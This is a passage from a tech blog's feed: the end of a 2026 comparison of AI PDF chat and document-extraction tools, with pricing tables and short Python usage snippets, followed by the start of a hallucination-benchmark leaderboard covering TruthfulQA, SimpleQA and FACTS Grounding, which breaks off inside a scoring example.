</table>
<h3 id="chatdoc">ChatDOC</h3>
<p>ChatDOC is the strongest consumer option right now. The free tier allows five document uploads per day at 200 pages each, with 300 questions daily - generous enough for real use. The Pro plan at $8.99/month adds GPT-4o access, formula recognition, and OCR for scanned documents. ChatDOC's citation feature traces answers to the specific page and passage, which matters when you need to verify an AI claim against a contract or technical spec.</p>
<p>For users who need to stay on budget, the add-on packages are a useful safety valve: extra files cost $0.29 each and extra pages cost $0.06 each, both valid for 90 days.</p>
<h3 id="chatpdf">ChatPDF</h3>
<p>ChatPDF is the entry point for many users and gets the basics right. Free usage requires no account: upload a PDF, start chatting. The 2-document daily limit on the free tier is workable for occasional use, and the smart routing between GPT-4o and GPT-4o-mini keeps response quality reasonable without inflating costs. The 120-page cap per file is a real constraint for long reports.</p>
<p>ChatPDF's strength is simplicity. There's nothing to configure, and sharing a secure link to a PDF-chat session takes seconds. It's not the best at long documents or multi-file analysis, but it remains the fastest way to extract a quick answer from a short PDF.</p>
<h3 id="humataai">HumataAI</h3>
<p>HumataAI is the option for students. The $1.99/month Student plan (with a verified .edu email) covers 200 pages per month - enough for coursework and paper review. The Expert plan at $9.99/month is competitive for individual researchers. HumataAI's search and comparison features across multiple documents are stronger than ChatPDF's, but the free tier at 10 answers per month and 60 pages is too restrictive for real evaluation.</p>
<h3 id="adobe-acrobat-ai-assistant">Adobe Acrobat AI Assistant</h3>
<p>Adobe bundles the AI assistant as a $4.99/month add-on to any Acrobat subscription. This is the right pick if you're already paying for Acrobat Pro ($19.99/month) and do substantial PDF editing. The AI chat supports up to 10 files simultaneously at 600 pages each - the largest multi-file context window in this category.</p>
<p>The 2026 Acrobat Studio plan ($24.99/month) bundles AI features, PDF editing, and creative tools. Whether it's worth the premium depends completely on how much you use Acrobat for non-AI tasks. As a standalone PDF chat tool, you can find better value at lower price points.</p>
<h3 id="askyourpdf-pdfai-lightpdf-ai-smallpdf-ai">AskYourPDF, PDF.ai, LightPDF AI, Smallpdf AI</h3>
<p>AskYourPDF's paid plan at $11.99/month is solid value: 1,200 questions per day, 50 documents per day, up to 2,500 pages per document. The plugin ecosystem is an edge over competitors. PDF.ai at $15/month is clean and straightforward but doesn't offer anything that distinguishes it from ChatDOC or AskYourPDF at a lower cost.</p>
<p>LightPDF AI bundles 25+ PDF tools (convert, compress, edit) with AI chat. The $19.99/month price is harder to justify unless you need those utility tools with the chat capabilities. Smallpdf AI offers free unlimited basic Q&amp;A without registration, which is useful for one-off summaries. Its EU hosting is a genuine differentiator for users with data residency requirements. The $12/month Pro plan unlocks advanced features.</p>
<hr>
<h2 id="developer-and-api-extraction-tools">Developer and API Extraction Tools</h2>
<p>This is where accuracy benchmarks and per-page costs matter. The two main public benchmarks for this category are <a href="https://arxiv.org/abs/2412.07626">OmniDocBench</a> (a CVPR 2025 benchmark covering text, tables, formulas, and reading order across nine document types) and Reducto's RD-TableBench (1,000 hand-labeled table images from varied public documents, scoring table similarity with a Needleman-Wunsch alignment algorithm).</p>
<h3 id="comparison-table-1">Comparison Table</h3>
<table>
  <thead>
      <tr>
          <th>Tool</th>
          <th>Accuracy (benchmark)</th>
          <th>Price per 1K pages</th>
          <th>Free Tier</th>
          <th>Output Formats</th>
          <th>Self-host</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Mistral OCR</td>
          <td>96.1% (internal)</td>
          <td>$1 (batch) / $2 (standard)</td>
          <td>No</td>
          <td>Markdown, JSON</td>
          <td>Selective</td>
      </tr>
      <tr>
          <td>LlamaParse</td>
          <td>Varies by mode</td>
          <td>$1.25 (simple) / $110+ (agent)</td>
          <td>10K credits</td>
          <td>Markdown, JSON</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Reducto</td>
          <td>90.2% (RD-TableBench)</td>
          <td>Custom (15K credits free)</td>
          <td>15K credits</td>
          <td>JSON, Markdown</td>
          <td>VPC (Enterprise)</td>
      </tr>
      <tr>
          <td>Unstructured.io</td>
          <td>Varies by strategy</td>
          <td>$30/1K pages (pay-as-you-go)</td>
          <td>15K pages</td>
          <td>JSON, HTML, Markdown</td>
          <td>Yes (open-source)</td>
      </tr>
      <tr>
          <td>Azure Doc Intelligence</td>
          <td>Not published</td>
          <td>$1.50 (read) / $10 (prebuilt) / $30 (custom)</td>
          <td>500 pages/month</td>
          <td>JSON</td>
          <td>No</td>
      </tr>
      <tr>
          <td>AWS Textract</td>
          <td>Not published</td>
          <td>$1.50 (OCR) / $15-65 (tables, forms)</td>
          <td>1K pages/month</td>
          <td>JSON</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Google Document AI</td>
          <td>Not published</td>
          <td>$1.50 (OCR), $30 (custom extractor)</td>
          <td>300 pages/month</td>
          <td>JSON</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Marker</td>
          <td>OmniDocBench: 0.861</td>
          <td>Free</td>
          <td>Unlimited (self-host)</td>
          <td>Markdown, JSON</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Docling</td>
          <td>OmniDocBench: 0.882</td>
          <td>Free</td>
          <td>Unlimited (self-host)</td>
          <td>DoclingDocument, Markdown, JSON</td>
          <td>Yes</td>
      </tr>
  </tbody>
</table>
<h3 id="mistral-ocr-mistral-ocr-2503--mistral-ocr-latest">Mistral OCR (mistral-ocr-2503 / mistral-ocr-latest)</h3>
<p>Mistral OCR is the best API pick for most document extraction workloads. In Mistral's internal benchmarks, the model scores 96.12% on table parsing, 94.29% on math, and 98.96% on scanned documents. On multilingual content, it hits 97.55% for Hindi and 97.11% for Chinese. The newer Mistral OCR 3 (released January 2026) improved accuracy on handwriting and forms, with a 74% win rate over OCR 2 in internal evaluations.</p>
<p><img src="/images/tools/best-ai-pdf-tools-2026-mistral-table.jpg" alt="Mistral OCR parsing a complex table with figures - rendered output showing clean HTML table structure">
<em>Mistral OCR rendering a complex multi-column table with figures. Output uses Markdown text with HTML table tags for structured cells.</em>
<small>Source: mistral.ai</small></p>
<p>Pricing is $2 per 1,000 pages with the standard API (<code>mistral-ocr-latest</code>), dropping to $1 per 1,000 pages with the Batch API - the lowest among the major cloud providers. The API processes up to 2,000 pages per minute per node. A limited self-hosting option exists for customers with classified or highly sensitive workloads, but it's not generally available.</p>
<p>The output format deserves mention: Mistral OCR returns interleaved text and image references in Markdown, with tables as HTML, and supports structured JSON output for downstream use. This makes it directly usable in <a href="/guides/what-is-rag/">RAG pipelines</a> without a separate parsing layer.</p>
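<p>In practice the call is a single request per document. A minimal sketch with the official Python SDK - method and field names follow the public docs at the time of writing, so treat them as assumptions and check the current API reference:</p>
<pre><code class="language-python"># Sketch: OCR a hosted PDF with Mistral's Python SDK and print per-page Markdown.
import os

from mistralai import Mistral

client = Mistral(api_key=os.environ["MISTRAL_API_KEY"])

response = client.ocr.process(
    model="mistral-ocr-latest",
    document={"type": "document_url", "document_url": "https://example.com/report.pdf"},
)

# Each page is returned as Markdown; tables arrive as HTML embedded in the Markdown.
for page in response.pages:
    print(page.markdown)
</code></pre>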
<h3 id="llamaparse--llamaindex">LlamaParse / LlamaIndex</h3>
<p>LlamaParse runs on a credit system: 1,000 credits = $1.25. The cost per page ranges from $0.00125 (one credit, simple text extraction) to roughly $0.11 per page (90 credits, using a top-tier LLM agent like Sonnet for parsing). For most RAG workflows, the &quot;cost-effective&quot; mode at 3 credits per page ($0.00375 per page) is the practical baseline.</p>
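<p>The credit arithmetic is easy to check against your own volumes. A quick calculator using the per-mode credit counts above (the mode names are shorthand, not official tier names):</p>
<pre><code class="language-python"># Back-of-the-envelope LlamaParse costs: 1,000 credits = $1.25, and each
# parsing mode burns a different number of credits per page (figures from above).
CREDIT_PRICE_USD = 1.25 / 1000  # $0.00125 per credit

CREDITS_PER_PAGE = {
    "simple": 1,          # plain text extraction
    "cost_effective": 3,  # practical baseline for most RAG workflows
    "agent_premium": 90,  # top-tier LLM agent parsing
}

def llamaparse_cost(pages, mode):
    return pages * CREDITS_PER_PAGE[mode] * CREDIT_PRICE_USD

for mode in CREDITS_PER_PAGE:
    print(f"100,000 pages, {mode}: ${llamaparse_cost(100_000, mode):,.2f}")
# 100,000 pages, simple: $125.00
# 100,000 pages, cost_effective: $375.00
# 100,000 pages, agent_premium: $11,250.00
</code></pre>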
<p>The 10,000 free credits on signup translate to roughly 3,300 pages in cost-effective mode - enough for a real pilot. LlamaParse is the natural fit if you're already using LlamaIndex for vector indexing and retrieval; the ecosystem integration reduces boilerplate. In March 2026, LlamaIndex also open-sourced LiteParse, a TypeScript-native local parser for agents that need zero-latency PDF parsing without cloud calls.</p>
<p>For complex layouts (financial tables, academic papers with equations), LlamaParse's premium agent mode is competitive, but Mistral OCR's batch pricing will be cheaper at scale.</p>
<h3 id="reducto">Reducto</h3>
<p>Reducto is built for production pipelines where table and form accuracy is critical. It combines traditional computer vision with vision-language models. On Reducto's own RD-TableBench, it scores an average table similarity of 90.2%. The benchmark is open-source (1,000 hand-labeled examples covering scanned tables, handwriting, merged cells, and multilingual content) and worth running against your own documents if you're evaluating vendors.</p>
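<p>If you want to replicate that kind of scoring on your own documents, the core of it is a standard sequence alignment. The sketch below is a generic Needleman-Wunsch over flattened cell sequences - the idea behind RD-TableBench's metric, not Reducto's exact implementation or scoring constants:</p>
<pre><code class="language-python"># Generic Needleman-Wunsch alignment of predicted vs reference table cells.
# Match/mismatch/gap weights are illustrative, not RD-TableBench's published values.
def align_cells(pred_cells, ref_cells, match=1.0, mismatch=-1.0, gap=-1.0):
    n, m = len(pred_cells), len(ref_cells)
    # dp[i][j] = best score aligning the first i predicted cells with the first j reference cells
    dp = [[0.0] * (m + 1) for _ in range(n + 1)]
    for i in range(1, n + 1):
        dp[i][0] = i * gap
    for j in range(1, m + 1):
        dp[0][j] = j * gap
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            step = match if pred_cells[i - 1] == ref_cells[j - 1] else mismatch
            dp[i][j] = max(
                dp[i - 1][j - 1] + step,  # align the two cells
                dp[i - 1][j] + gap,       # predicted cell has no reference counterpart
                dp[i][j - 1] + gap,       # reference cell missing from the prediction
            )
    return dp[n][m]

# A prediction that drops one cell still aligns closely with the reference.
print(align_cells(["Q1", "120", "Q2"], ["Q1", "120", "Q2", "135"]))  # 2.0
</code></pre>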
<p>Pricing starts free for the first 15,000 credits, then moves to custom growth pricing. There's no public per-page rate - Reducto targets enterprises and pricing requires a conversation. HIPAA and SOC2 compliance, EU/AU data residency, and VPC deployment are available on paid tiers.</p>
<h3 id="unstructuredio">Unstructured.io</h3>
<p>Unstructured offers both an open-source library and a managed platform. The open-source library is free to self-host and supports 60+ file types. The managed API charges $0.03 per page pay-as-you-go after 15,000 free pages - meaningfully cheaper than Azure or AWS for high-volume basic extraction. Compliance certifications (HIPAA, SOC2, GDPR, ISO 27001) make it viable for regulated industries.</p>
<p>The parsing strategy selection - Fast, Hi-Res, VLM, Auto - lets engineers trade speed against accuracy. Hi-Res and VLM modes handle complex layouts but at higher latency and cost. The open-source path is the cheapest option if you have the infrastructure to run it.</p>
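<p>The strategy switch is a one-line change in the open-source library. A short sketch using the documented partition API (filenames are placeholders):</p>
<pre><code class="language-python"># unstructured's strategy trade-off: "fast" for quick text pulls,
# "hi_res" for layout-aware parsing that preserves table structure.
from unstructured.partition.pdf import partition_pdf

fast_elements = partition_pdf(filename="quarterly-report.pdf", strategy="fast")

hires_elements = partition_pdf(
    filename="quarterly-report.pdf",
    strategy="hi_res",            # layout model + OCR: slower, better on tables
    infer_table_structure=True,   # keep table structure in element metadata
)

tables = [el for el in hires_elements if el.category == "Table"]
print(f"{len(fast_elements)} fast elements, {len(tables)} tables detected in hi_res mode")
</code></pre>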
<p><img src="/images/tools/best-ai-pdf-tools-2026-unstructured-ui.jpg" alt="Unstructured.io platform UI showing document processing workflow and pipeline configuration">
<em>The Unstructured platform's no-code workflow builder. Engineers can also access the same processing via API without the UI layer.</em>
<small>Source: unstructured.io</small></p>
<h3 id="azure-ai-document-intelligence-aws-textract-google-document-ai">Azure AI Document Intelligence, AWS Textract, Google Document AI</h3>
<p>These are the incumbent cloud offerings. They're battle-tested at enterprise scale but expensive compared to newer entrants.</p>
<p><strong>Azure AI Document Intelligence</strong>: The Read model costs $1.50 per 1,000 pages, matching Google's OCR rate. Prebuilt models (invoices, receipts, contracts) run $10 per 1,000 pages. Custom extractors cost $30 per 1,000 pages for the first million pages, dropping to $20 afterward. Azure's advantage is deep integration with the Microsoft ecosystem and strong form-field extraction on standard document types.</p>
<p><strong>AWS Textract</strong>: Basic text detection runs $1.50 per 1,000 pages. Table and form extraction (Analyze Document) ranges from $15 to $65 per 1,000 pages depending on features enabled. Volume discounts kick in above one million pages, dropping basic detection to $0.60 per 1,000 pages. Textract's table accuracy on Reducto's RD-TableBench was notably below Reducto and Mistral OCR in the benchmark results.</p>
<p><strong>Google Document AI</strong>: OCR costs $1.50 per 1,000 pages (dropping to $0.60 above five million pages). Specialized processors - invoice parser, expense parser - each cost $0.10 per 10 pages ($10 per 1,000 pages). The Custom Extractor is $30 per 1,000 pages, same as Azure. Google's strength is language coverage and integration with Google Cloud workflows.</p>
<p>For teams already deep in AWS, Azure, or GCP, the convenience of staying in one cloud often justifies the price premium. For greenfield projects, Mistral OCR's accuracy and pricing make it hard to justify the incumbents on cost alone.</p>
<h3 id="marker-and-docling-open-source">Marker and Docling (Open Source)</h3>
<p>These are the two strongest open-source options for teams that want full control, zero per-page costs, and on-premises deployment.</p>
<p><strong>Docling</strong> (IBM Research, Apache 2.0) outputs a structured <code>DoclingDocument</code> format that preserves semantic hierarchy - not just text, but the relationships between elements. It scored 0.882 on OmniDocBench text fidelity in evaluations. Docling reached 37,000 GitHub stars and is optimized for production RAG pipelines. It handles PDFs, DOCX, PPTX, HTML, and images.</p>
<p><strong>Marker</strong> (MIT license, available at <a href="https://github.com/datalab-to/marker">github.com/datalab-to/marker</a>) scored 0.861 on OmniDocBench and supports an optional <code>--use_llm</code> flag that layers an LLM on top for accuracy-critical documents. Without the flag, it runs fast on CPU. With it, accuracy approaches commercial APIs. Marker is slower than Docling at scale (one benchmark put it at 53 seconds per page on complex academic documents vs Docling's single-pass approach), but the LLM enhancement mode is useful for isolated high-value documents.</p>
<p>Both tools are available via PyPI. Neither offers cloud hosting or SLAs - you're running the infrastructure.</p>
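<p>Getting started with either is a pip install away. Here is a minimal Docling sketch following its documented quickstart (Marker's CLI with the <code>--use_llm</code> flag mentioned above is the equivalent one-off route):</p>
<pre><code class="language-python"># Convert a PDF with Docling and export the structure-preserving result to
# Markdown for a downstream RAG pipeline. The file path is a placeholder.
from docling.document_converter import DocumentConverter

converter = DocumentConverter()
result = converter.convert("annual-report.pdf")  # accepts local paths or URLs

doc = result.document                # the DoclingDocument object
print(doc.export_to_markdown())      # Markdown export; JSON export is also available
</code></pre>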
<hr>
<h2 id="which-should-you-use">Which Should You Use?</h2>
<p><strong>For one-off summaries and Q&amp;A:</strong> ChatDOC free tier covers most needs. Use Adobe Acrobat AI if you already have an Acrobat subscription.</p>
<p><strong>For student and research use:</strong> HumataAI's $1.99/month student plan or ChatDOC free tier. AskYourPDF for heavy multi-document work.</p>
<p><strong>For production extraction pipelines:</strong> Start with Mistral OCR. It's the cheapest major cloud API with benchmark-backed accuracy. If you need deep LlamaIndex integration, add LlamaParse for complex layouts. For tables at enterprise scale with custom SLAs, Reducto.</p>
<p><strong>For regulated or air-gapped environments:</strong> Unstructured.io open-source or Docling for self-hosted extraction. Azure Document Intelligence if regulatory requirements demand a commercial vendor with established compliance certifications.</p>
<p><strong>For cost-sensitive high-volume OCR:</strong> Google Document AI's OCR tier ($1.50/1K pages) or Mistral's batch API ($1/1K pages). AWS Textract's advanced features are the most expensive in this group.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-ai-pdf-tool-is-most-accurate-on-tables">Which AI PDF tool is most accurate on tables?</h3>
<p>Mistral OCR leads at 96.1% in internal benchmarks. On Reducto's public RD-TableBench, Reducto scores 90.2%. Neither AWS Textract nor GPT-4o alone matches Reducto's table accuracy in that benchmark, and GPT-4o has documented hallucination issues on dense tables.</p>
<h3 id="can-i-use-these-tools-with-sensitive-documents">Can I use these tools with sensitive documents?</h3>
<p>Unstructured.io, Docling, and Marker can run fully self-hosted. Reducto offers HIPAA/SOC2 compliance and VPC deployment on enterprise plans. Mistral OCR has a selective self-hosting option for classified workflows. Consumer tools like ChatPDF and HumataAI are cloud-only.</p>
<h3 id="whats-the-cheapest-way-to-extract-text-from-pdfs-at-scale">What's the cheapest way to extract text from PDFs at scale?</h3>
<p>Mistral OCR's Batch API at $1 per 1,000 pages is the lowest public rate among cloud APIs. Self-hosted Docling or Marker are free, but you're paying for compute.</p>
<h3 id="does-llamaparse-support-non-pdf-formats">Does LlamaParse support non-PDF formats?</h3>
<p>Yes. LlamaParse supports PDF, PPTX, DOCX, XLSX, HTML, JPEG, and more. Pricing and accuracy vary by file type.</p>
<h3 id="what-output-formats-do-developer-apis-produce">What output formats do developer APIs produce?</h3>
<p>Mistral OCR outputs Markdown with HTML tables and supports structured JSON. LlamaParse produces Markdown and JSON. Unstructured outputs JSON, HTML, and Markdown. Docling produces its own DoclingDocument format plus Markdown and JSON export. Azure, AWS, and Google all return JSON.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://mistral.ai/news/mistral-ocr">Mistral OCR announcement and benchmarks</a></li>
<li><a href="https://mistral.ai/news/mistral-ocr-3">Mistral OCR 3 release (January 2026)</a></li>
<li><a href="https://reducto.ai/blog/rd-tablebench">Reducto RD-TableBench benchmark</a></li>
<li><a href="https://reducto.ai/pricing">Reducto pricing</a></li>
<li><a href="https://unstructured.io/pricing">Unstructured.io pricing</a></li>
<li><a href="https://www.llamaindex.ai/pricing">LlamaIndex / LlamaParse pricing</a></li>
<li><a href="https://cloud.google.com/document-ai/pricing">Google Document AI pricing</a></li>
<li><a href="https://aws.amazon.com/textract/pricing/">AWS Textract pricing</a></li>
<li><a href="https://azure.microsoft.com/en-us/pricing/details/document-intelligence/">Azure AI Document Intelligence pricing</a></li>
<li><a href="https://www.humata.ai/pricing">HumataAI pricing</a></li>
<li><a href="https://chatdoc.com/blog/chatdoc-pro-plan/">ChatDOC Pro plan</a></li>
<li><a href="https://www.chatpdf.com/">ChatPDF</a></li>
<li><a href="https://arxiv.org/abs/2412.07626">OmniDocBench paper (CVPR 2025)</a></li>
<li><a href="https://github.com/datalab-to/marker">Marker on GitHub</a></li>
<li><a href="https://github.com/docling-project/docling">Docling on GitHub</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-ai-pdf-tools-2026_hu_cb013f12d95f4051.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-ai-pdf-tools-2026_hu_cb013f12d95f4051.jpg" width="1200" height="675"/></item><item><title>Hallucination Benchmarks Leaderboard: April 2026</title><link>https://awesomeagents.ai/leaderboards/hallucination-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 20:11:08 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/hallucination-benchmarks-leaderboard/</guid><description>&lt;p>Every frontier model provider claims their system is more accurate and less hallucinatory than the competition. This leaderboard cuts through those claims by looking at what the benchmarks actually show - and the picture is messier than the marketing suggests.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Every frontier model provider claims their system is more accurate and less hallucinatory than the competition. This leaderboard cuts through those claims by looking at what the benchmarks actually show - and the picture is messier than the marketing suggests.</p>
<p>No single benchmark captures the full scope of how models fail on facts. TruthfulQA tests whether models parrot common misconceptions. SimpleQA probes short-form factual recall. FACTS Grounding measures faithfulness to provided source documents. The Vectara leaderboard tracks summarization-time hallucinations. AA-Omniscience penalizes wrong answers and rewards abstention. Together they give a more honest picture of where models stand.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Gemini 2.5 Pro leads SimpleQA at 53.0%; no model cracks 70% on the full FACTS Benchmark Suite</li>
<li>Reasoning models score worse on grounded summarization - the &quot;think more&quot; approach sometimes makes faithfulness worse</li>
<li>Phi-3.5-MoE-instruct tops TruthfulQA at 0.775, outscoring much larger closed models on that older benchmark</li>
</ul>
</div>
<h2 id="why-factuality-benchmarks-diverge">Why Factuality Benchmarks Diverge</h2>
<p>Before diving into the numbers, it helps to understand what each benchmark actually tests. They don't measure the same thing, and strong performance on one doesn't predict performance on another.</p>
<p>If you want the conceptual background, our <a href="/guides/ai-hallucinations-explained/">guide to AI hallucinations</a> explains the core failure modes, and our <a href="/guides/understanding-ai-benchmarks/">understanding AI benchmarks guide</a> covers what benchmark scores can and can't tell you.</p>
<table>
  <thead>
      <tr>
          <th>Benchmark</th>
          <th>What it measures</th>
          <th>Format</th>
          <th>Dataset size</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>TruthfulQA</td>
          <td>Resistance to common misconceptions</td>
          <td>Multiple-choice (MC1/MC2)</td>
          <td>817 questions</td>
      </tr>
      <tr>
          <td>SimpleQA</td>
          <td>Short-form factual recall</td>
          <td>Open-ended Q&amp;A</td>
          <td>4,326 questions</td>
      </tr>
      <tr>
          <td>FACTS Grounding</td>
          <td>Faithfulness to source documents (up to 32K tokens)</td>
          <td>Long-form generation</td>
          <td>1,719 examples</td>
      </tr>
      <tr>
          <td>Vectara HHEM</td>
          <td>Hallucination rate in document summarization</td>
          <td>Summarization</td>
          <td>7,700+ articles</td>
      </tr>
      <tr>
          <td>HaluEval</td>
          <td>Hallucination detection across QA, dialogue, summarization</td>
          <td>Classification</td>
          <td>35,000 examples</td>
      </tr>
      <tr>
          <td>HalluLens</td>
          <td>Extrinsic and intrinsic hallucination taxonomy</td>
          <td>Multi-task</td>
          <td>Dynamic generation</td>
      </tr>
      <tr>
          <td>AA-Omniscience</td>
          <td>Factual recall across 42 topics, rewards abstention</td>
          <td>Open-ended Q&amp;A</td>
          <td>6,000 questions</td>
      </tr>
  </tbody>
</table>
<p>One important distinction runs through all of these: hallucination and factuality aren't the same thing. HalluLens (from Meta FAIR, published at ACL 2025) formalizes this: an extrinsic hallucination contradicts a model's own training data, while an intrinsic hallucination contradicts the context provided in the prompt. Benchmarks conflate these two failure modes frequently, which is why a model can look excellent on one test and poor on another.</p>
<h2 id="truthfulqa">TruthfulQA</h2>
<p>TruthfulQA, introduced by Lin et al. in 2021, targets imitative falsehoods - wrong answers that feel plausible because they appear in human-written text. The 817 questions span 38 categories including health, law, finance, and politics.</p>
<p>The benchmark has a well-documented weakness: it's easy to game by training on similar questions, and contamination from public benchmarks is a real concern. Still, it remains widely reported and its MC2 scoring (normalized probability assigned to the set of true answers) is more robust than MC1.</p>
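<p>For concreteness, MC2 reduces to a simple ratio: the probability mass a model assigns to the set of true reference answers, normalized over all answer options. A toy illustration with made-up probabilities:</p>
<pre><code class="language-python"># TruthfulQA MC2 as described above: normalized probability assigned to true answers.
def truthfulqa_mc2(option_probs, true_options):
    total_mass = sum(option_probs.values())
    true_mass = sum(p for opt, p in option_probs.items() if opt in true_options)
    return true_mass / total_mass

option_probs = {
    "No, cracking your knuckles does not cause arthritis": 0.55,
    "Yes, cracking your knuckles causes arthritis": 0.30,
    "Yes, it wears down the joints": 0.15,
}
true_options = {"No, cracking your knuckles does not cause arthritis"}

print(round(truthfulqa_mc2(option_probs, true_options), 3))  # 0.55
</code></pre>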
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>TruthfulQA Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Phi-3.5-MoE-instruct</td>
          <td>Microsoft</td>
          <td>0.775</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Granite 3.3 8B Instruct</td>
          <td>IBM</td>
          <td>0.669</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Phi 4 Mini</td>
          <td>Microsoft</td>
          <td>0.664</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Phi-3.5-mini-instruct</td>
          <td>Microsoft</td>
          <td>0.640</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Hermes 3 70B</td>
          <td>Nous Research</td>
          <td>0.633</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Llama 3.1 Nemotron 70B Instruct</td>
          <td>NVIDIA</td>
          <td>0.586</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Qwen2.5 14B Instruct</td>
          <td>Alibaba Cloud</td>
          <td>0.584</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Jamba 1.5 Large</td>
          <td>AI21 Labs</td>
          <td>0.583</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Qwen2.5 32B Instruct</td>
          <td>Alibaba Cloud</td>
          <td>0.578</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Command R+</td>
          <td>Cohere</td>
          <td>0.563</td>
      </tr>
  </tbody>
</table>
<p><em>Source: llm-stats.com, 17 self-reported results, no verified external evaluation.</em></p>
<p>The most striking pattern: Microsoft's Phi family holds three of the top four slots. Phi-3.5-MoE-instruct's 0.775 score stands well above the field. Notably absent from the top 10 are GPT-4o, Claude Opus, and Gemini - the headline frontier models. That's partly because TruthfulQA has become saturated for the largest models (which were likely trained with TruthfulQA-style data in mind), and partly because the leaderboard only has 17 submissions - closed model providers don't always report this score publicly.</p>
<p>The original paper documented an inverse scaling effect: larger models answered <em>less</em> truthfully on this benchmark, not more. That relationship has weakened with instruction tuning and RLHF, but it is a reminder that scale alone doesn't fix factuality.</p>
<p><img src="/images/leaderboards/hallucination-benchmarks-leaderboard-benchmark-chart.jpg" alt="Stock market analysis documents with magnifying glass - representing close examination of AI model claims">
<em>Factuality benchmarks require examining model outputs against verifiable sources, much like document analysis.</em>
<small>Source: pexels.com</small></p>
<h2 id="simpleqa">SimpleQA</h2>
<p>SimpleQA, released by OpenAI in October 2024, focuses on short-form factual questions with verifiable single answers. The 4,326 questions were verified by multiple human raters and are designed to have clear, objective correct answers - not ambiguous or opinion-based queries.</p>
<p>This is arguably the most important factuality benchmark right now, because it's recent, resistant to training contamination (questions weren't publicly available before the benchmark launched), and covers a wide factual domain.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>SimpleQA Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Gemini 2.5 Pro</td>
          <td>Google</td>
          <td>53.0%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Qwen3 235B A22B Instruct 2507</td>
          <td>Alibaba</td>
          <td>50.6%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Qwen3 VL 235B A22B Instruct</td>
          <td>Alibaba</td>
          <td>46.7%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>GPT-4.1</td>
          <td>OpenAI</td>
          <td>40.4%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Qwen3 Next 80B A3B Instruct</td>
          <td>Alibaba</td>
          <td>40.1%</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Grok 3 Beta</td>
          <td>xAI</td>
          <td>38.3%</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Qwen3 VL 235B A22B Thinking</td>
          <td>Alibaba</td>
          <td>37.9%</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Grok 3</td>
          <td>xAI</td>
          <td>37.4%</td>
      </tr>
      <tr>
          <td>9</td>
          <td>ERNIE 4.5 300B A47B</td>
          <td>Baidu</td>
          <td>36.9%</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Claude 3.7 Sonnet Thinking</td>
          <td>Anthropic</td>
          <td>32.8%</td>
      </tr>
      <tr>
          <td>11</td>
          <td>Claude 3.7 Sonnet</td>
          <td>Anthropic</td>
          <td>32.8%</td>
      </tr>
      <tr>
          <td>12</td>
          <td>DeepSeek R1</td>
          <td>DeepSeek</td>
          <td>29.1%</td>
      </tr>
  </tbody>
</table>
<p><em>Source: pricepertoken.com SimpleQA leaderboard, updated April 17, 2026. 45 models evaluated, average score 20.8.</em></p>
<p>A few things stand out. First, Gemini 2.5 Pro's lead is real but not commanding - the gap between first and fourth (GPT-4.1) is about 13 percentage points. Second, the Qwen3 family punches above its weight, with three models in the top five. Third, the absolute scores are low across the board. The leader gets 53% right. The field average is 20.8%. These aren't figures a vendor would put in a press release, which is probably why SimpleQA scores often get buried when companies announce new models.</p>
<p>The Thinking variants don't consistently outperform their non-thinking counterparts on this benchmark - Claude 3.7 Sonnet Thinking ties with Claude 3.7 Sonnet at 32.8%.</p>
<h2 id="facts-grounding">FACTS Grounding</h2>
<p>FACTS Grounding, from Google DeepMind, tests something different: given a long document (up to 32,000 tokens) and a user request, does the model answer faithfully based on what's in the document without hallucinating content not present in the source?</p>
<p>The benchmark uses 1,719 examples across finance, technology, medicine, law, and retail. Three LLM judges - Gemini 1.5 Pro, GPT-4o, and Claude 3.5 Sonnet - each score responses, and the final score averages their judgments to reduce individual model bias. Responses that fail to address the user request are disqualified before scoring.</p>
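<p>A simplified illustration of that aggregation: disqualified responses are counted against the model here, and the three judge verdicts are averaged per example. The paper describes the exact handling, so treat this as a sketch rather than the official scoring code:</p>
<pre><code class="language-python"># Simplified FACTS-Grounding-style scoring: eligibility filter, then averaged judge verdicts.
def facts_grounding_score(examples):
    per_example = []
    for ex in examples:
        if not ex["addresses_request"]:
            per_example.append(0.0)            # disqualified before factuality judging
            continue
        verdicts = ex["judge_grounded"]         # one boolean per judge model
        per_example.append(sum(verdicts) / len(verdicts))
    return 100 * sum(per_example) / len(per_example)

examples = [
    {"addresses_request": True,  "judge_grounded": [True, True, True]},
    {"addresses_request": True,  "judge_grounded": [True, False, True]},
    {"addresses_request": False, "judge_grounded": [True, True, True]},
]
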